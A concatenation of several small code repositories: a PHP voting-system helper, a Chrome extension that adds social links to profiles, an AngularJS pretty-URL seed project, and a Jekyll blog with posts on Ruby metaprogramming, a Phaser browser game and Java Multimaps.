`log` varchar(255) DEFAULT NULL,
`username` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
-- ----------------------------
-- Records of vote_log
-- ----------------------------
INSERT INTO `vote_log` VALUES ('1', '2017-02-26 14:44:41', '1', 'admin');
<file_sep><?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2016 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: 流年 <<EMAIL>>
// +----------------------------------------------------------------------
// 应用公共文件
/**
* 获取footer
* return footer
* @return string
*/
function footer() : string {
$data = date('Y');
return "<footer data-am-widget=\"footer\"
class=\"am-footer am-footer-default\"
data-am-footer=\"{ }\">
<div class=\"am-footer-miscs \">
<p>CopyRight©$data <a href='https://blog.coderwu.com' target='_blank'>coderWu</a></p>
</div>
</footer>";
}
/**
* 获取header
* @param string $title
* @return string
*/
function getHeader(string $title) : string {
return '<header class="am-topbar am-topbar-inverse"><h1 class="am-topbar-brand">
<a href="#">' . $title . '</a></h1>
<button class="am-topbar-btn am-topbar-toggle am-btn am-btn-sm am-btn-success am-show-sm-only" data-am-collapse="{target: \'#doc-topbar-collapse\'}">
<span class="am-sr-only">导航切换</span> <span class="am-icon-bars"></span></button>
<div class="am-collapse am-topbar-collapse" id="doc-topbar-collapse">
<ul class="am-nav am-nav-pills am-topbar-nav">
<li><a href="' . \think\Config::get("WEB_ROOT") . '/public/index.php/index/Index/votePage">首页</a></li>
<li><a href="' . \think\Config::get("WEB_ROOT") . '/public/index.php/index/Index/createVote">发起投票</a></li>
<li><a id="admin">添加用户</a></li>
</ul><div class="am-topbar-right">
<button class="am-btn am-btn-primary am-topbar-btn am-btn-sm" id="name">
</div></div></header>';
}
| 36525d0ff600a6ba166669fea5ad57cc3c79905d | [
"SQL",
"Text",
"PHP"
] | 13 | PHP | Sweetmile/votingSystem | 7fae86f7d692ee7f981010f12452038bbe235f81 | 3cb8663182b69737851d13e62ac134bdf718efa1 |
refs/heads/master | <file_sep>var texts = ["좋은 원재료 ", "다양한 영양 파우더 ", "최적의 블렌딩 노하우"];
var count = 0;
var index = 0;
var currentText = '';
var letter = '';
(function type(){
if(count === texts.length){
count = 0;
}
currentText = texts[count];
letter = currentText.slice(0, index++);
document.querySelector('span.type').textContent = letter;
if(letter.length === currentText.length){
count++;
index = 0;
}
setTimeout(type, 350);
}());
<file_sep> const refresh = $('.refresh > div a span');
const vitamin = $('.vitamin > div span');
const fitness = $('.fitness > div span');
const kids = $('.kids > div span');
const greek = $('.greek > div span');
const local = $('.local > div span');
$('#smoothie .s_grid > div').hover(function(){
let index = $(this).index();
if(index === 0){
refresh.html('과일듬뿍 영양 가득한 기분전환 스무디');
refresh.css('font-family','Noto Sans KR, sans-serif');
refresh.css('font-size','1.4rem');
$(this).css('line-height','1.4rem');
} else if( index === 1){
vitamin.html('활력에너지와 비타민C 충전 스무디');
vitamin.css('font-family','Noto Sans KR, sans-serif');
vitamin.css('transition','0.4s ease');
vitamin.css('font-size','1.4rem');
} else if( index === 2){
fitness.html("운동 전 후 단백질 보충 스무디와 <br> 다이어터를 위한 슬림 스무디");
fitness.css('font-family','Noto Sans KR, sans-serif');
fitness.css('transition','0.4s ease');
fitness.css('font-size','1.4rem');
} else if( index === 3){
kids.html('아이들에게 꼭 필요한 <br>유산균과 비타민을 듬뿍 넣은 스무디');
kids.css('font-family','Noto Sans KR, sans-serif');
kids.css('transition','0.4s ease');
kids.css('font-size','1.4rem');
} else if( index === 4){
greek.html('장시간 자연 발표시킨 그리스식 <br> 저지방 요거트 스무디 ');
greek.css('font-family','Noto Sans KR, sans-serif');
greek.css('transition','0.4s ease');
greek.css('font-size','1.4rem');
} else if( index === 5){
local.html('우리 땅에서 자란 몸에 좋은 열매와 <br>채소를 가장 맛있게 먹을 수 있는 스무디 ');
local.css('font-family','Noto Sans KR, sans-serif');
local.css('transition','0.4s ease');
local.css('font-size','1.4rem');
} }, function(){
var index = $(this).index();
if(index == 0){
refresh.html('REFRESH');
refresh.css('font-family','Fredoka One, cursive');
refresh.css('font-size','2rem');
} else if( index === 1){
vitamin.html('VITAMIN UP');
vitamin.css('font-family','Fredoka One, cursive');
vitamin.css('transition','0.4s ease');
vitamin.css('font-size','2rem');
} else if( index === 2){
fitness.html("fitness <br>&<br> slim");
fitness.css('font-family','Fredoka One, cursive');
fitness.css('transition','0.4s ease');
fitness.css('font-size','2rem');
} else if( index === 3){
kids.html('kids');
kids.css('font-family','Fredoka One, cursive');
kids.css('transition','0.4s ease');
kids.css('font-size','2rem');
} else if( index === 4){
greek.html('greek <br> yorgurt ');
greek.css('font-family','Fredoka One, cursive');
greek.css('transition','0.4s ease');
greek.css('font-size','2rem');
} else if( index === 5){
local.html('local <br> & <br> veggie');
local.css('font-family','Fredoka One, cursive');
local.css('transition','0.4s ease');
local.css('font-size','2rem');
}
})
| 45267af8105b6566a3f1dc61c7a673033bf5beea | [
"JavaScript"
] | 2 | JavaScript | Taeyoung1102/portfolio190509 | 13d9facc8c60f3824be4d8915f58023027518578 | 9494dec453baec937dace5aad3e8a0b34a9e8d51 |
refs/heads/master | <file_sep># Motivis-Extension
Welcome to the Motivis-Extension project! The purpose of this chrome extension is to allow for a greater connectivity among apprentices in the CareerWise Colorado program. Since the bootcamp is over, networking and connecting are difficult since there is no easy way to find contact information and other social media links.
Concept figures showcasing my idea will be added here soon. I want this to be a learning experience for everyone involved, so feel free to constribute and expand the project.
## Phase 1 ##
I'm going to develop a hard-coded example of what I imagine will show up on everyone's profile. This has been accomplished and Phase 2 is now in development.
## Phase 2 ##
Phase 2 is to make this extension customizable so everyone has their own unique links to their respective social media links. There are a few things that need to be changed in order for this to work:
-- Hard code in (not ideal, but secure until better solution is thought of) the links of whoever wants them.
-- Any social media links that aren't put in shouldn't show up on the person's profile.
### Future expansion ideas ###
A few ideas on how to extend the extensions capabilities:
-- Change the background image to a customizable image.
-- Have a report feature so innapropriate content gets taken down.
-- There needs to be an options page to edit the links easily for any given profile (need to figure out how to secure this page).<file_sep>var twitterURL = chrome.extension.getURL("images/twitter.png");
var linkedinURL = chrome.extension.getURL("images/linkedin-logo.png");
var snapchatURL = chrome.extension.getURL("images/snapchat.png");
var facebookURL = chrome.extension.getURL("images/social-facebook-icon.png");
var githubURL = chrome.extension.getURL("images/github.png");
function openForm(){
window.open('https://goo.gl/forms/ams8ht436efujegy1');
}
// Twitter Link
$(".navItems").append('<li><a target="_blank" href="https://www.twitter.com/mrjustpeachy"> <img id="twitter-icon" src="' + twitterURL + '" alt="Twitter Logo" height="30px" /> </a></li>');
// Linkedin Link
$(".navItems").append('<li><a target="_blank" href="https://www.linkedin.com/in/dillonpietsch/"> <img id="linkedin-icon" src="' + linkedinURL + '" alt="Linkedin Logo" height="30px" /> </a></li>');
// Github Link
$(".navItems").append('<li> <a target="_blank" href="https://github.com/MrJustPeachy"> <img id="github-icon" src="' + githubURL + '" alt="Github Logo" height="30px" /> </a></li>');
// Button for people to submit their own information
$(".navItems").append('<li style="float: right; margin-right: 5%;"><input type="button" value="Get your social media buttons for your profile!" class="btn primary-btn" onclick="window.open(\'https://goo.gl/forms/ams8ht436efujegy1\')" /> </li>')
/* WORK IN PROGRESS
// Snapchat Link
$(".user-information").append('<a href="https://www.twitter.com/mrjustpeachy"> <img id="snap-icon" src="snap.png" alt="Snapchat Logo" height="40" width="40"/>');
document.getElementById("snap-icon").src = snapchatURL;
// Facebook Link
$(".user-information").append('<a href="https://www.twitter.com/mrjustpeachy"> <img id="facebook-icon" src="facebook.png" alt="Facebook Logo" height="40" width="40"/> </a>');
document.getElementById("facebook-icon").src = facebookURL;
*/ | 6658a3e9a09fb41461b6e957a212b7636e41e4c0 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | MrJustPeachy/Motivis-Extension | a1204a05c69fa41acf7f246af2147ae7385cdda1 | c20c40308b6f06016f0290aa0fbf1a7d3dd6edf3 |
refs/heads/master | <repo_name>ngscripts/angular-pretty-url-seed<file_sep>/js/controllers/homeController.js
/**
* Created by ulhaq on 4/7/2017.
*/
app.controller('homeCtrl', function ($scope) {
$scope.pageName = 'Home Controller'+appResources.options.appName;
});<file_sep>/server-prod.js
/**
* Created by ulhaq on 4/7/2017.
*/
var express = require('express');
var path = require('path');
var expressApp = express();
expressApp.set('port', 8888);
expressApp.use(express.static(path.join(__dirname, '/build')));
expressApp.use("/*", express.static(path.join(__dirname, '/build/index.html')));
var server = expressApp.listen(expressApp.get('port'), function() {
var port = server.address().port;
console.log('Production Magic Happening on Port : ' + port);
console.log('Acces URL : http://localhost');
});<file_sep>/js/controllers/aboutController.js
/**
* Created by ulhaq on 4/7/2017.
*/
app.controller('aboutCtrl', function ($scope) {
$scope.pageName = 'About Controller'+appResources.options.appName;
});<file_sep>/js/app.js
/**
* Created by ulhaq on 4/3/2017.
*/
'use strict';
var app = angular.module(appResources.options.appName, allPreSources);
app.config(function ($routeProvider, $locationProvider) {
$routeProvider
.when('/', {
controller: 'homeCtrl',
templateUrl: '/assets/templates/basic.html',
controllerAs: 'ctrl'
})
.when('/about', {
title: 'About',
controller: 'aboutCtrl',
templateUrl: '/assets/templates/basic.html',
controllerAs: 'ctrl'
});
$routeProvider.otherwise({redirectTo: '/'});
$locationProvider.html5Mode(true);
});
app.run(['$rootScope', function($rootScope) {
$rootScope.appName = appResources.options.appName;
$rootScope.$on('$routeChangeSuccess', function (event, current, previous) {
var title = appResources.options.appName;
if ( typeof current.$$route.title != "undefined" && current.$$route.title!=='')
title = title + ' - '+current.$$route.title;
$rootScope.title = title;
});
}]);<file_sep>/js/appConfig.js
/**
* Created by ulhaq on 4/10/2017.
*/
var appResources = {
options: {
'appName': 'app',
'url': 'app/url'
},
libraries: [
'ngRoute',
'ngAnimate',
'ngSanitize',
'ngTouch'
],
services: []
};
var allPreSources = appResources.libraries.concat(appResources.services);<file_sep>/README.md
# `angularjs-pretty-url-seed` — The only HTML 5 Mode Routing Seed for Angularjs with Build and Server
This project is an application skeleton for Angularjs web app with pretty URLS, server everything set up in advance.
You can use it to quickly bootstrap your angular webapp projects and dev environment for these projects.
The seed contains a sample AngularJS application and is preconfigured to install the Angular
framework and a bunch of development and testing tools for instant web development gratification.
The seed app has a few controller, services, directives and components. It even shows how to structure your application
in a good way so that you can have complex structure develop easily with full DRY (Don't repeat yourself)
the seed is very easy to use most of it focus on configuration.
## Getting Started
To get you started you can simply clone the `angular-pretty-url-seed` repository and install the dependencies:
### Prerequisites
You need git to clone the `angular-pretty-url-seed` repository. You can get git from [a link](https://github.com/ngscripts/angular-pretty-url-seed).
We also use a number of Node.js tools to initialize and test `angular-seed`. You must have Node.js
and its package manager (npm) installed. You can get them from [a link](https://github.com/ngscripts/angular-pretty-url-seed).
### Clone `angular-pretty-url-seed`
Clone the `angular-pretty-url-seed` repository using git:
```
git clone https://github.com/ngscripts/angular-pretty-url-seed.git
cd angular-pretty-url-seed
```
If you just want to start a new project without the `angular-pretty-url-seed` commit history then you can do:
```
git clone --depth=1 https://github.com/ngscripts/angular-pretty-url-seed.git <your-project-name>
```
The `depth=1` tells git to only pull down one commit worth of historical data.
### Install `gulp` globally using `npm`
```
npm install -g gulp
```
Don't forget to use `sudo` while working in Linux.
### Install Dependencies
We have two kinds of dependencies in this project: tools and Angular framework code. The tools help
us manage and test the application.
* We get the tools we depend upon via `npm`, the [Node package manager][npm].
* We get the Angular code via ``, a [client-side code package manager][bower].
* In order to run the end-to-end tests, you will also need to have the
[Java Development Kit (JDK)][jdk] installed on your machine. Check out the section on
[end-to-end testing](#e2e-testing) for more info.
We have preconfigured `npm` to automatically run `bower` so we can simply do:
```
npm install
```
Behind the scenes this will also call `bower install`. After that, you should find out that you have
two new folders in your project.
* `node_modules` - contains the npm packages for the tools we need
* `app/bower_components` - contains the Angular framework files
*Note that the `bower_components` folder would normally be installed in the root folder but
`angular-seed` changes this location through the `.bowerrc` file. Putting it in the `app` folder
makes it easier to serve the files by a web server.*
### Run the Application in Development Mode
You can run the development server without - No Watchers Required:
```
npm run serve
```
### Build the Application
Build the Application to `/build` folder using the following Command:
```
npm run build
```
### Run the Application using Production Server
Run the Application from `/build` folder using the following Command:
```
npm run serve-prod
```
### ----- ENJOY ---- | f5307cf4287a6083cff084d6be8631b31fc5092d | [
"JavaScript",
"Markdown"
] | 6 | JavaScript | ngscripts/angular-pretty-url-seed | 5b67b71d51ebc07a68015b8b9eb306e3d8d976b1 | 13d43095cd8dd79703bee3d5e93be40389d1e9bb |
refs/heads/main | <repo_name>mithrandirum/express.checkpoint<file_sep>/app.js
const express = require('express');
const app = express();
const port = 4000;
const path = require('path')
app.set('views',path.join(__dirname, 'views'))
app.set('view engine', 'pug')
const myLogger = function (req, res, next) {
var d = new Date();
var hours = d.getHours();
var day = d.getDay()
if (hours >= 9 && hours <= 17){
if(day >= 1 && day < 5) {
next()
}
}else {
res.send('sorry , service is unavailable at the moment , checkout time schedule for further information')
}
}
app.use(myLogger)
app.get('/', (req , res) => {
res.render('home-page')
})
app.get('/services', (req , res ) => {
res.render('our-services')
})
app.get('/contact', (req , res ) => {
res.render('contact-us')
})
app.listen(port) | 8f9b343da7236258d91379ea0d7c35950e094991 | [
"JavaScript"
] | 1 | JavaScript | mithrandirum/express.checkpoint | 247d457114667405af272a4d6a15addab2a6eba2 | fac1c56107a954885e03eb3a12ac2aa003697d0a |
refs/heads/master | <repo_name>Omnipresent/omnipresent.github.com<file_sep>/_posts/2012-03-30-hackers-language.markdown
---
layout: post
title: Hackers Language
date: 2012-03-30
categories: [ruby,meta]
---
More I take a closer look at Ruby as a language, the more I feel it is a "Hackers Language". It really does makes programming fun again, take a look at [why's poignant guide to Ruby](http://mislav.uniqpath.com/poignant-guide/book/chapter-2.html#section1). After working on a few Rails projects, I realized I didn't have a decent hold on ruby and how the internals of the language really word. So I decided to kick it up a notch and step into the "ninja" territories of Ruby. Along with [githubbing](https://github.com/Omnipresent), I picked up pragprog's "Metaprogramming in Ruby". This is a hell of a book not just for technical reasons but for the writing style as well. Most of the other technical books spend endless pages explaining a detailed core principle, not realizing that they lost the reader long back in the explanation. Metaprogramming in Ruby, makes you pair-program with "Bill", the fictional more seasoned ruby developer in a one-on-one communication style writing that I've read in novels.
Enough about book, this post is about going through some of the key metaprogramming concepts I've learned from the book and my own digging around github projects. Having spent a long time in the Java world, the concepts below made me embrace Ruby even further.
## Method Missing
`Kernel#method_missing()` gets called whenever a missing method is called and returns a NoMethodError. By overriding `method_missing()`, we can intercept the method that was intended to be called and do various different things with it. Messages sent to `method_missing()` can be processed by the receiver even though the called method isn't defined. This, for obvious reasons, is known as a _Ghost Method_. There are great examples of how to utilize `method_missing()` but the trivial code below will illustrate its power. We'll call a `plus()` method on a `Fixnum` class to add two numbers.
{% highlight ruby %}
irb(main):001:0> 1.plus(5) #=>NoMethodError: undefined method plus
class Fixnum
def method_missing(id, *args)
return self + args[0] if id =~ /plus/
end
end
irb(main):048:0> 1.plus(2) #=> 3
{% endhighlight %}
In the above code we open the `Fixnum` class and intercept messages by overriding `method_missing`. So if a `plus` is called on a `Fixnum`, we're catching the method with `method_missing()` and passing it onto the actual `+` method. Pretty nifty eh! But these `Ghost Methods` can become a nightmare when you are hunting for a bug in a large codebase. If the receiver already has an `instance_method` defined as the one you are trying to define with `method_missing` (in our case, if `plus` was already defined on `Fixnum` class) then there will be a clash and piece of code residing in your defined method will never be reached. Good way to overcome this issue is to have a `BlankSlate` class in which pre-existing instance_methods can be undefined using `undef_method`. The class below removes all `instance_methods` leaving behind only `object_id`, `instance_eval` and methods beginning with `__`
{% highlight ruby %}
class CleanSlate
def self.hide(name)
if instance_methods.include?(name) and
name !~ /^(__|instance_eval|object_id)/
undef_method name
end
end
instance_methods.each {|m| hide(m)}
end
puts CleanSlate.instance_methods #=>[:object_id, :instance_eval, :__send__, :__id__]
{% endhighlight %}
Closest thing I've found of implementing `method_missing` in java is [Dynamic Proxy](http://www.ibm.com/developerworks/java/library/j-jtp08305/index.html)
## Blocks and Closures
Blocks are pieces of code that are ready to run and can be passed around. It uses bindings that are there at the moment when its called and parameters can be passed to them as well. The `yield` keyword actually runs the piece of code. Let's look at an example of a fibonacci series
{% highlight ruby %}
def fibupto(max)
n1, n2 = 1,1
while (n1 <= max)
yield n1
n1, n2 = n2, n1+n2
end
end
fibupto(10) {|f| print f, " "} #=> 1, 1, 2, 3, 5, 8
{% endhighlight %}
In the above snippet, the variable `f` receives the value passed to the `yield` for each iteration, so the block prints the calculated numbers. Now let's look at a practical example of how a closure can be helpful. If you are from the Java world then seeing your code base littered with code like below probably ruins your day.
{% highlight java %}
BuffereInputStream bis = null;
try {
BuffereInputStream bis = ...;
... ; // Perform action with bis1
} finally {
if (bis != null)
bis.close();
}
{% endhighlight %}
To fix this problem in Java, <NAME> wrote the original proposal for [Automatic Resource Management Bocks][https://docs.google.com/View?docid=dffxznxr_1nmsqkz]. This has been added to Java 7's [features](http://docs.oracle.com/javase/7/docs/technotes/guides/language/try-with-resources.html). Basically whatever is inside the `try` block will be disposed off automatically. Let's do the same thing in ruby using blocks!
{% highlight ruby %}
class TestTry < Test::Unit::TestCase
class Resource
def close
@close = true
end
def closed?
@close
end
end
def test_disposes_of_resource
r = Resource.new
try (r) {}
assert r.closed?
end
def test_disposes_of_resources_in_case_of_exception
r = Resource.new
assert_raises(Exception) {
try(r) {
raise(Exception)
}
}
assert r.closed?
end
end
{% endhighlight %}
Above snippet has test cases for trying our `try()` method in ruby. First test ensures that the resource is closed after the use, and the second test ensures that the resource gets closed even if an exception occurs. To make these tests pass we have to define a try method on the `Kernel` which will take a block and ensure that the resource is closed.
{% highlight ruby %}
module Kernel
def try(resource)
begin
yield
ensure
resource.close
end
end
end
{% endhighlight %}
Let's run our tests to see if they pass.
{% highlight bash %}
% ruby closeresource.rb
Running tests:
..
Finished tests in 0.001241s, 1612.2258 tests/s, 2418.3387 assertions/s.
2 tests, 3 assertions, 0 failures, 0 errors, 0 skips
{% endhighlight %}
Most of the places where we'd use loops in Java, can be replaced by blocks in Ruby. For example: [each](http://ruby-doc.org/core-1.9.3/Enumerator.html#method-i-each), [group_by](http://ruby-doc.org/core-1.9.3/Enumerable.html#method-i-group_by), [reject](http://ruby-doc.org/core-1.9.3/Enumerable.html#method-i-reject) etc.
## instance_eval
`instance_eval` gives you access to an object's private methods and instance variables. From a java perspective, this is really scary since nothing is really "private". I have a love and hate relationship with "private" methods in Java. I understand that they are a very, very important design concepts but who are we trying to hide these "private/protected" methods from? It makes sense if you are writing an API though.
## Procs and lambda
Since a block can't be called without an object, `Proc` provides a block that has been turned into an object. `lambda` is similar to a proc with subtle differences. In short, there are two differences in `proc` and `lambda`: 1)`return`, in lambda return just returns from itself, however, in `proc`, it returns from the scope where proc was defined. 2) `arity`, lambda's are strict about arguments, procs are not. The example below shows the power of lambda. I've tried to take a shot at a simple immitation of the `highline` gem. It makes processing command line input easy by passing `lambdas`.
{% highlight ruby %}
class Pleaser
attr_reader :question
def ask (question, operation)
@question = question
@operation = operation
puts @question
@userinput = gets
end
def results
@operation.call(@userinput)
end
end
todo = Pleaser.new
todo.ask("Things to do?", lambda{|x| x.split(",")})
puts "#{todo.question} = #{todo.results}"
{% endhighlight %}
The `Pleaser` class will take an operation from the user, store it in `@operation`, and process an input from the command line. The operation is executed when `results` is called. Let's see it in action.
{% highlight bash %}
% ruby pleaser.rb
Things to do?
Write code, Drink beer
Things to do? = ["Write code", " Drink beer\n"]
{% endhighlight %}
Using this, we can pass anything in `lambda` to be called by the `Pleaser` class
## Duck Typing and Singleton Methods
Simply, duck typing lets you pass anything as an argument to the method without worrying about the type. Ruby treats methods on objects as messages that are being passed back and forth rather than what class they belong to. This really takes the burden off the programmers head but I can also understand it would become difficult in a large codebase where developers change from year to year. Furthermore, Ruby allows `singleton_methods`. These methods don't live in a class but "inside the object" (more on this in next section). Let's look at an example.
{% highlight ruby %}
beer = "guinness is awesome"
def beer.awesome?
(self =~ /^guinness/) == 0
end
beer.awesome? => true
beer = "budweiser is awesome"
beer.awesome? => undefined method 'awesome?'
{% endhighlight %}
The above snippet shows that `singleton methods` are defined on a particular object only! This comes in handy at times when we know for sure that a particular instance should have a special behavior. In Java, we'd defined a different class for this type of behavior. Ruby's answer for this is `singleton_methods`. I personally don't like code littered with one-time-used classes.
## Eigen Classes
Eigen classes are hidden classes. In the last section when we defined `singleton_methods` they actually get stored in hidden classes. Hidden classes can be used for class extension. If you are trying to define a `class` method by `including` a module then hidden classes can be utilized. Yet another example:
{% highlight ruby %}
module SomeModule
def some_method
puts "hello"
end
end
class SomeClass
class << self
include SomeModule
end
end
SomeClass.some_method => "hello"
{% endhighlight %}
In the above example, `some_method` is an instance method of the hidden class of `SomeClass` and also a class method of `SomeClass`. To make things easier, Ruby provides the `extends` keyword to do the same thing we did above.
{% highlight ruby %}
module M
def some_soup
puts "NO SOUP FOR YOU!"
end
end
class C
extend M
end
C.some_soup #=> NO SOUP FOR YOU
C.new.some_soup #=> NoMethodError
{% endhighlight %}
In the above snippet, the class extends the module instead of including it. This makes the module methods, class methods of `C`.
## Method Aliases
Method aliases allow you to give an alias name to an existing method. When you redefine the old method, it creates a new method and attaches an existing name to the new method. This means that you still have reference to the old method. So, if you have the need for a method to be surrounded by some code, before or after, you can use method aliases to your advantage. If you think this sounds like AOP, you would be correct. Ruby makes AOP much easier since `alias` is baked right into the language. Check out objectmentor's great presentation on [AOP in Ruby](http://objectmentor.com/resources/articles/AOP_in_Ruby.pdf) for more. Let's look at an example where we surround the `*` method of `Fixnum` class so that result of multiplication is ten times.
{% highlight ruby %}
class Fixnum
alias :orig :*
def * (n)
return self.orig(n).orig(10)
end
end
class BrokenMathTest < Test::Unit::TestCase
def test_broken_math
assert_equal 10, 1*1
assert_equal 60, 3*2
assert_equal 100, -5*-2
end
end
% ruby alias.sb
Running tests:
.
Finished tests in 0.000649s, 1540.5828 tests/s, 4621.7484 assertions/s.
1 tests, 3 assertions, 0 failures, 0 errors, 0 skips
{% endhighlight %}
We keep reference to the old `*` in `orig` and then redefine the `*` to make it ten times.
## Conclusion
The main benefit of knowing all these tricks is to actually start thinking in terms of the language. Ruby treats the programmer as a mature being rather than spoon feeding and holding hands along the way like other languages. However, that maturity should be handled with responsibility and the powers of the language should not be abused by monkey patching the code everywhere. Finally, again thanks to [@nusco](https://twitter.com/#!/nusco) for the awesome book that gets you up to speed on Ruby concepts. In the coming weeks, I'll try to supplement things learned from the book with code on github.
<file_sep>/js/application.js
jQuery(document).ready(function($){
$(".twitter").hover(function() {
$("#mousing").text("Twitter");
});
$(".twitter").mouseout(function() {
$("#mousing").html(" ");
});
$(".git").hover(function() {
$("#mousing").text("Github");
});
$(".git").mouseout(function() {
$("#mousing").html(" ");
});
$(".rss").hover(function() {
$("#mousing").text("RSS");
});
$(".rss").mouseout(function() {
$("#mousing").html(" ");
});
});
<file_sep>/_posts/2012-01-15-self-in-ruby.markdown
---
layout: post
title: Ruby Self
date: 2012-01-15
categories: [ruby,learning]
---
With the beginning of 2012 I've started giving Ruby a serious try. No longer will I depend on quick google searches to help me
through the various ruby scripts I've been writing. Instead I've decided to sit down and understand the basic concepts that make
Ruby such a pleasant ecosystem to work with. This especially holds true when coming from the Java ecosystem, even with new JVM langs
spurring up.
Book I'm reading for my Ruby hunger is The Well Grounded Rubyist. This book is so good that I could not put it down before reading 4 chapters
in a sitting. Apart from explaining Ruby in an excellent way, the structure and flow of the book is too tempting. Each section ends with couple
of lines about what the next section will hold, this concept seems to be missing from many technical books.
## Instanstiating Self methods of base classes
If you extend from a superior class and wish to use the superior class's self methods then `new` is your friend. Lets look at an example of such
hierachy
```ruby
class Parent
def self.to_parent
new.testparent
end
def testparent
puts "testparent"
end
end
class Child < Parent
end
puts Child.to_parent #prints testparent
```
In the above code the `to_parent` is a class method of `Parent`, therefore in order to invoke any instance methods we require an instance of the class
and we can get that by `new`. If `new.testparent` is changed to just `testparent` then the code will fail because inside a `self` instance there is no
`testparent`.
<file_sep>/_posts/2014-12-05-Dodging-Burgers.markdown
---
layout: post
title: Dodging Burgers
date: 2015-12-05
---
A simple game I made while playing around with [Phusion Passenger](https://www.phusionpassenger.com/)
The goal of the game is see how long you can avoid being hit by the randomized burgers dropping from top
The JS source code is available [here](/main.js)
<iframe width="450" height="700" src="/game.html" frameborder="0" allowfullscreen></iframe>
<file_sep>/main.js
var game = new Phaser.Game(400, 490, Phaser.AUTO, 'game_div');
var enemy
var game_state = {};
game_state.main = function() { };
game_state.main.prototype = {
preload: function() {
this.game.stage.backgroundColor = "#71c5cf";
this.game.load.image('enemy', 'assets/burger.png');
this.game.load.image('player', 'assets/box.png');
},
create: function() {
this.player= this.game.add.sprite(100,400,'player');
this.enemies = game.add.group();
this.enemies.createMultiple(200, 'enemy');
this.timer = this.game.time.events.loop(750, this.new_enemy, this);
this.cursors = game.input.keyboard.createCursorKeys();
this.score = 0;
this.lives = 3;
var style = {font: "30px Arial", fill: "#ffffff"};
this.label_score = this.game.add.text(20, 20, "0", style);
},
update: function() {
this.player.body.velocity.setTo(0, 0);
if (this.cursors.left.isDown) {
console.log(this.player.body.x)
if (this.player.body.x > 10)
this.player.body.velocity.x = -300;
}
else if (this.cursors.right.isDown) {
console.log(this.player.body.x)
if (this.player.body.x < 350)
this.player.body.velocity.x = 300;
}
this.game.physics.overlap(this.player, this.enemies, this.restart_game, null, this);
},
jump: function () {
this.player.body.velocity.x += 5;
},
restart_game: function() {
this.game.time.events.remove(this.timer);
this.game.state.start('main');
},
overlap: function () {
this.lives -= 1;
console.log("overlapped");
},
new_enemy: function () {
this.score += 1;
this.label_score.content = this.score;
enemy = this.enemies.getFirstDead();
var x = Math.floor(Math.random()*350)+1;
console.log(x);
enemy.reset(x,-100);
var y = Math.random() * (800 - 200) + 200;
enemy.body.gravity.y = y;
console.log(enemy.outOfBounds);
}
};
game.state.add('main', game_state.main);
game.state.start('main');
<file_sep>/drafts/2012-03-26-europe-vacation.markdown
---
layout: post
title: Europe Vacation
---
Beginning of March, 2012 me and my wife went on a much needed vacation to Europe. We visited Lucerne, Paris, Venice, and Rome. We convered everything
in about twelve days, which is a bit hectic for most people, but we enjoyed our on-the-go active schedule. Wanting to do all the planning on our own, we
didn't want to take a packaged trip and had everything planned after weeks of lurking around on tripadvisor. We made full use of the awesome europe
train network.
## Lucerne, Switzerland
We flew directly directly to Zurich Airport and boarded the Airport rail. Instead of some sleezy elevator music, the automated announcements in the airport
rail were made with cowbells ringing in the background. From Zurich Airport train station we boarded the two hour train to Bahnhof station (Lucerne). It
didn't take us long to see beauty of Lucerne since right outside the train station is part of lake Lucerne. We had bit of a trouble finding our hote but
a nice guy spotted our lost looks and asked if we needed help. He went out of his way to actually walk with us all the way to our hotel. After a few hours
in the hotel, we started our journey to Mt. Pilatus. which involves train from Bahnhof and a cable car all the way up the mountain. The view of the Alps
from top of the mountain is breathtaking. After spending a lot of time up the mountain we grabbed a bite to eat at the restaurant on top of the mountain.
Beer and food tastes much better when view of the Alps comes on the side. An old guy was playing Alphorn which made the experience even better. We spent
the night roaming local streets of Lucerene. The next day we took the train from Bahnhof to Engleberg and a cable car up to Mt. Titlis. The view of the
swiss landscape from the cable car as its about to reach the top of the moutain is amazing. Our only regret at Mt. Titlis was that we neither of us knew
how to ski/snow-board. I've snowboard before but that resulted in a
fractured ankle as I was coming down a huge slope after just 5 minutes of "training".
Ever since then I've never tried again
<file_sep>/playground.markdown
---
layout: page
---
# Online Mentor
** paid mentor protege program
** gather senior people in different fields
<br/>
# Job Post Board
** specifically for wash-dc area
** specifically for small biss (8A)
** SBA supported?
<file_sep>/_posts/2011-12-08-NFJS.markdown
---
layout: post
title: No Fluff Just Stuff - Reston
date: 2011-12-08
categories: [conferences]
---
I attended my first ever NFJS Software Symposium in Reston on November 4-6, 2011. All the sessions were great and at times I felt the need to clone myself so I could attend some sessions at the same time.
## Sessions
* Spring for XML-Haters - <NAME>
* Testing with Spock - <NAME> (Live Coding!)
* Gradle: Bringing Engineering back to builds - <NAME>
* Effective Java Reloaded - <NAME>
* Art of problem solving - <NAME>
* Emergent Design - <NAME>
* Java Developer's guide to Android Basics - <NAME>ard
* Automating Requirements with Geb and Spock - <NAME>
* Resource Oriented Architectures: REST - <NAME>
* Pragmatic Architecture - Ted Neward
* Architectural Kata Workshop - Ted Neward
<file_sep>/_posts/2012-08-10-Multimap.markdown
---
layout: post
title: Multimaps
date: 2012-08-10
categories: [java,guava]
---
Multimap is a useful datastructure created using a Key, Value pair. In a Multimap a key can be associated with multiple values. So when a Collection is assigned to a Key, the key will hold-on to the Collection of values the second time elements are added to the Collection.
It can be visualized as:
{% highlight ruby %}
"User1" => [1, 2, 3, 4]
"User2" => [3]
{% endhighlight %}
[Guava](http://code.google.com/p/guava-libraries/) and [Apache Commons](http://commons.apache.org/) provide Multimaps and various other useful datastructures built in. But how exactly do these libraries make use of plain Java to create such a datastructure? Let's take a look!
## Interface
Let's build a contract for our MultiMap. There can be various methods in a Multimap but let's just concentrate on the key methods `get, put, and size`.
{% highlight java %}
public interface Multimap <K, V> {
boolean put (K k, V v);
Collection<V> get (K k);
int size();
}
{% endhighlight %}
## Abstract it out
Let's provide an abstract implementation of the Multimap so that the code stays solved
{% highlight java %}
public abstract class AbstractMultiMap <K, V> implements Multimap<K, V> {
private Map <K, Collection<V>> map;
int totalSize;
protected AbstractMultiMap (Map<K, Collection<V>> map) {
this.map = map;
}
